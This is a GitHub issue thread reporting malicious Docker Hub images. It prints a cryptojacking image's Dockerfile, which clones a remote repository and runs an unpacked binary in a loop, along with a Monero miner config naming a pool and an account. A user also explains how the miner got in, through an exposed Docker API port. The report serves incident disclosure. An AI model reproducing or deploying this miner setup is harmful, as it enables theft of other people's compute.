Closed fernandodebrando closed 6 years ago
Thanks for the report @fernandodebrando. Could you elaborate on those images? Have you seen it being used in an attack?
I recently found on a server a container with this image l0s3r/m3n
```dockerfile
FROM phusion/baseimage:latest
LABEL maintainer=ziw
RUN apt-get -y update && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y \
    wget \
    xz-utils \
    git \
    curl \
    zip && \
    rm -rf /var/lib/apt/lists/*
WORKDIR /tmp
RUN git clone https://github.com/l0se3/runandrun.git
WORKDIR /tmp/runandrun
RUN unzip var.zip
RUN chmod +x *
RUN chmod +x run.sh
```
Run container
```sh
$ docker run -it --network=none l0s3r/m3n /bin/bash
```
Contents of the files
run.sh
```sh
#!/bin/sh
while :
do
    echo "Press [CTRL+C] to stop.."
    ./nodjs -c config.json
done
```
config.json
```json
{
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "av": 0,  // algorithm variation, 0 auto select
    "background": false,  // true to run the miner in the background
    "colors": true,  // false to disable colored output
    "cpu-affinity": null,  // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null,  // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 0,  // donate level, mininum 1%
    "log-file": null,  // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 95,  // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 60,  // print hashrate report every N seconds
    "retries": 5,  // number of times to retry before switch to backup server
    "retry-pause": 5,  // time to pause between retries
    "safe": false,  // true to safe adjust threads and av settings for current CPU
    "syslog": false,  // use system log for output messages
    "threads": 0,  // number of miner threads
    "pools": [
        {
            "url": "xmr.pool.minergate.com:45700",  // URL of mining server
            "user": "sam05@protonmail.com",  // username for mining server
            "pass": "x",  // password for mining server
            "keepalive": true,  // send keepalived for prevent timeout (need pool support)
            "nicehash": false,  // enable nicehash/xmrig-proxy support
            "variant": -1  // algorithm PoW variant
        }
    ],
    "api": {
        "port": 0,  // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null,  // access token for API
        "worker-id": null  // custom worker-id for API
    }
}
```
Thanks for your report. We've deactivated the user.
Malicious image found in the account https://hub.docker.com/r/l0se3/dah/ on Docker Hub. Please help; this is the same as @fernandodebrando's feedback.
@fangbo947705, have you seen it being used in an attack? Also report the account on GitHub: https://github.com/l0se3x.
Yes, it ran on our server. When I remove it, it comes back later. I have found the cause: I had exposed port 2375 to the internet, so he can use this port to control my Docker service. Now I have forbidden this port.
Malicious image found in the account https://hub.docker.com/r/l0s3r on Docker Hub.